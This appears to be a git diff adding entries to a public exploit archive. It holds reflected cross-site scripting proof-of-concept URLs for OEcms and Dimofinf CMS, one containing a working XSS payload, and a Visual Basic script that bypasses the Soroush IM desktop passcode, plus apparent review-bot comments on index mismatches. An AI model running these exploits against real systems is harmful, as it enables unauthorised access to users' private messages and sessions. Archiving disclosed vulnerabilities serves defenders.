diff --git a/exploits/php/webapps/44895.txt b/exploits/php/webapps/44895.txt
new file mode 100644
index 000000000..a80fa282c
--- /dev/null
+++ b/exploits/php/webapps/44895.txt
@@ -0,0 +1,13 @@
+# Title: OEcms 3.1 - Cross-Site Scripting
+# Author: Felipe "Renzi" Gabriel
+# Date: 2018-06-15
+# Software: OEcms v3.1
+# CVE: CVE-2018-12095
+
+# Technical Details & Description:
+# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application.
+# The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request.
+
+# PoC
+
+http://Target/cms/info.php?mod=list"
\ No newline at end of file
diff --git a/exploits/php/webapps/44897.txt b/exploits/php/webapps/44897.txt
new file mode 100644
index 000000000..a17a79553
--- /dev/null
+++ b/exploits/php/webapps/44897.txt
@@ -0,0 +1,11 @@
+# Title: Dimofinf CMS 3.0.0 - Cross-Site Scripting
+# Author: Felipe "Renzi" Gabriel
+# Date: 2018-06-13
+# Software: Dimofinf CMS Version 3.0.0
+# CVE: CVE-2018-12094
+
+# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "Dimofinf CMS" web-application.
+# The vulnerability is located in the 'id' parameter of the`news.php` action GET method request.
+
+# PoC
+http://Target/news.php?id=604""</|\><plaintext/onmouseover=prompt(/XSS/)>
\ No newline at end of file
diff --git a/exploits/windows/local/44896.vb b/exploits/windows/local/44896.vb
new file mode 100644
index 000000000..ad79cb650
--- /dev/null
+++ b/exploits/windows/local/44896.vb
@@ -0,0 +1,65 @@
+# Exploit Title: Soroush IM Desktop app 0.15 - Authentication Bypass
+# Date: 2018-06-13
+# Exploit Author: VortexNeoX64
+# Vendor Homepage: https://soroush-app.ir
+# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe
+# Version: 0.15 BETA
+# Tested on: Windows 10 1803
+
+# Security Issue:
+# Attackers can unlock the client app installed on Windows OS(others?) without the passcode
+# and access to all the files, chats, images, and etc.
+# the attacker can then send, receive message of any kind on the behalf of the authorized user.
+
+# PoC (.NET 4.0 Visual Basic)
+
+''make sure before running this exploit the Soroush Messager window is NOT minimized
+''adding InteropServices for DLLImport
+Imports System.Runtime.InteropServices
+Module Module1
+
+''FindWindow API from user32.dll to get the window handler by lpWindowName
+ <DllImport("user32.dll", SetLastError:=True)>
+ Private Function FindWindow(lpClassName As String, lpWindowName As String) As IntPtr
+ End Function
+''MoveWindow API from user32.dll to move and resize the window to trigger the bypass process
+ <DllImport("user32.dll", SetLastError:=True)> Private Function MoveWindow(hWnd As IntPtr, X As Integer, Y As Integer,
+ nWidth As Integer, nHeight As Integer, bRepaint As Boolean) As Boolean
+ End Function
+ Sub Main()
+ Try
+ Console.WriteLine("<<<<<Soroush IM Desktop GUI misbehaviour leads to passcode bypass>>>>> ")
+ Console.WriteLine("****** Developer: NeoVortex")
+ Console.WriteLine("****** Client Version 0.15 BETA")
+ Console.WriteLine("****** Tested on windows 10 1803")
+ Console.WriteLine("[****] Make sure the Messager windows is not minimized ")
+ Console.WriteLine("[Press any key to start the exploit...]")
+ Console.ReadKey()
+ Dim pss() As Process = Process.GetProcessesByName("Soroush")
+ Dim hWnd As IntPtr = FindWindow(Nothing, "Soroush")
+'' check if the app is running
+ If (pss.Count > 0) Then
+ Console.WriteLine("[****] Process found with id: " & pss(0).Id)
+ Console.WriteLine("[****] Process File " & pss(0).MainModule.FileName)
+ Console.WriteLine("[****] Resizing to trigger the vulnerability.....")
+'' move and resize the window
+ MoveWindow(hWnd, 100, 100, 100, 100, True)
+ Console.WriteLine("[****] Done")
+ Console.WriteLine("[****] Now close the Soroush messager windows via X button (NOT via system tray) , then reopen it ")
+ Console.WriteLine("[****] Passcode will be bypassed! ")
+'' now you should close the exploit window and then close the Soroush messager window manually via X button(NOT FROM SYSTEM TRAY) because the Soroush messager window dose not support WM_CLOSE signal for the single window closing
+''if anyone could close the GUI window without accually killing the app, he/she is welcome at gitub link below.
+ Else
+''app is not ruuning
+ Console.WriteLine("[----]Process not found ")
+ End If
+ Console.ReadKey()
+
+ Catch ex As Exception
+ Beep()
+ MsgBox(ex.Message, 16)
+ Console.ReadKey()
+ End Try
+ End Sub
+
+End Module
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 555276b74..dbf816cd4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
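Review bot: The header block at the top of the hunk records `# Version: 0.15 BETA` and `# Tested on: Windows 10 1803` but says nothing about disclosure status or a fixed build, so a defender reading this entry cannot tell whether later releases are affected or whether updating resolves the issue. Two header lines such as `# Vendor notified: <DATE-PLACEHOLDER>` and `# Fixed in: <unknown>` would make the entry usable for exposure assessment, matching the structured headers the other two files in this commit carry. The comment `''app is not ruuning` in the Else branch should read `''app is not running`.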
@@ -9781,6 +9781,7 @@ id,file,description,date,author,type,platform,port
 44888,exploits/windows/local/44888.txt,"Microsoft Windows 10 - Child Process Restriction Mitigation Bypass",2018-06-13,"Google Security Research",local,windows,
 44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux,
 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,
+44896,exploits/windows/local/44896.vb,"Soroush IM Desktop app 0.15 - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39554,3 +39555,5 @@ id,file,description,date,author,type,platform,port
 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
 44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,
+44895,exploits/php/webapps/44895.txt,"OEcms 3.1 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
+44897,exploits/php/webapps/44897.txt,"Dimofinf CMS 3.0.0 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
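Review bot: The two rows added in the second hunk disagree with the headers of the files they index: both rows carry author `Renzi` and date `2018-06-15`, while 44895.txt and 44897.txt name the author `Felipe "Renzi" Gabriel`, and 44897.txt is dated `2018-06-13`. Defenders correlate advisories on exactly these fields, so whichever value is canonical, the index row and the file header should agree; if the file header is authoritative the 44897 row should read `2018-06-13`. The 44896 row in the first hunk matches its file's author and is consistent.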